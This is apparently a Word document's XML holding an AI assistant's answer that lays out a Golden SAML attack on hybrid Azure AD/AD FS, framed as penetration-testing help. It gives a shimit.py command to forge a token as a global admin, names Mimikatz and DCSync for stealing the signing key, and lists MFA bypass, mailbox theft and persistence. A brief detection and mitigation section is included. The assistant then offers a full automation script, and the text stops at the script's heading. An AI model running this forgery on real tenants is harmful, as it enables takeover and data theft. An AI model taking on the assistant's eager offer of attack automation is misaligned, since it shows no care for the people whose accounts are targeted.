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05C2" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Azure Golden SAML Attack (AD FS / Hybrid Identity Bypass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7884E7F2" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Here’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>corrected, summarized, and Azure-specific rewrite</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Golden SAML attack</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> technique, tailored for use during an </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure penetration test</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC33483" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r>
        <w:pict w14:anchorId="24F33E3B">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C25A55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🥇</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Golden SAML Attack (AD FS / Hybrid Identity Bypass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10596E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📌</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01438FAE" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Golden SAML attack</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> allows an attacker to forge a SAML token to impersonate any user—including admins—</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>without needing passwords or MFA</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">, enabling access to Azure AD-integrated apps like </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Office 365</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Portal</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Graph API</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBBAF7" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r>
        <w:pict w14:anchorId="22A71170">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49704469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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> When This Applies (Hybrid Identity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FD5BB4" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Azure AD is federated with </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AD FS</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> (on-prem Active Directory Federation Services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB3EB98" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">AD FS signs tokens used by Azure AD / Microsoft 365 via </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SAML 2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6212F1" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">You have </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exfiltrated the AD FS token-signing certificate's private key</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> from a domain controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567D709B" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r>
        <w:pict w14:anchorId="7E54AB68">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2555C7F9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🔓</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E550E1" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AD FS Token-Signing Private Key</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> (e.g., dumped via Mimikatz or DCSync)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065CB523" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AD FS Public Certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9DBAAF" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Federation Metadata (IdP issuer name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170FA38B" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Username or UPN to impersonate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E01C86A" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SAML forging tool</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> (e.g., shimit.py, AADInternals, SAMLator, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357257D6" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r>
        <w:pict w14:anchorId="1140BE0E">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA07199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🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tool Setup (shimit.py example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C32F802" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t># Install dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6167A0" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t>pip install boto3 botocore defusedxml enum34 python-dateutil lxml signxml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D14B8E" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35"/>
    <w:p w14:paraId="494C45C0" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t># Forge SAML token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1CB550" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t>python shimit.py \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E647A60" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  -idp "http://sts.domain.com/adfs/services/trust" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB7BD8B" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  -pk token_signing_private.key \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EF6352" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  -c adfs_public_cert.pem \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C23B4C" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  -u "domain\\adminuser" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E69ABDA" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  -n "adminuser@domain.com" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F28A7C" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  -r "AzureGlobalAdmin" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B78B0B" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  -id "1234567890"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395DF03A" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r>
        <w:pict w14:anchorId="7BC7C991">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D5A2A1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🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CCF839" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Access </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft 365</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> as any user, including global admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B4E3D" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Bypass </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MFA</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>conditional access policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D56875" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6615125D" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>portal.azure.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516E6D06" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:lastRenderedPageBreak/>
        <w:t>outlook.office365.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145966F5" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>graph.microsoft.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF8E6F" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Any </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SAML-integrated enterprise app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69981276" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r>
        <w:pict w14:anchorId="3A8CBF81">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A09266A" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Post-Exploitation Targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C13796A" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Download mailboxes, SharePoint files, Teams chats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3225A73C" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Modify Azure resources via Graph API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D6676" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Add users, change roles, implant persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A0A983" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r>
        <w:pict w14:anchorId="449B8D35">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E93EEF7" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F3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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Detection &amp; Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C43549E" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> Detection is difficult: forged tokens are cryptographically valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1217E6" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472BBEFA" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Tokens issued from unexpected IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744A505D" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Access without MFA on MFA-enabled users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F9EDEE" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Irregular AD FS signing key usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C299DE6" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> Mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739B639B" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Rotate AD FS token-signing certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B493675" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Migrate away from AD FS to </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure AD cloud-native auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BAF7CD" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r>
        <w:pict w14:anchorId="1E84FFD3">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C15062" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Would you like a full Python script or post-exploitation module for automating this SAML attack in hybrid Azure environments?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1835A26F" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CA54634" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t>The script requires the signxml and lxml libraries to forge a signed SAML token. Since they're not currently available in this environment, you can install them locally with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B83167A" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t>pip install signxml lxml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F021B23" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Here’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>summary of what the script does</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED7FF3C" w14:textId="77777777" w:rsidR="003E3F35" w:rsidRPr="002B73BB" w:rsidRDefault="003E3F35" w:rsidP="003E3F35">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Golden SAML Token Forging Script for Azure AD</w:t>
      </w:r>
    </w:p>
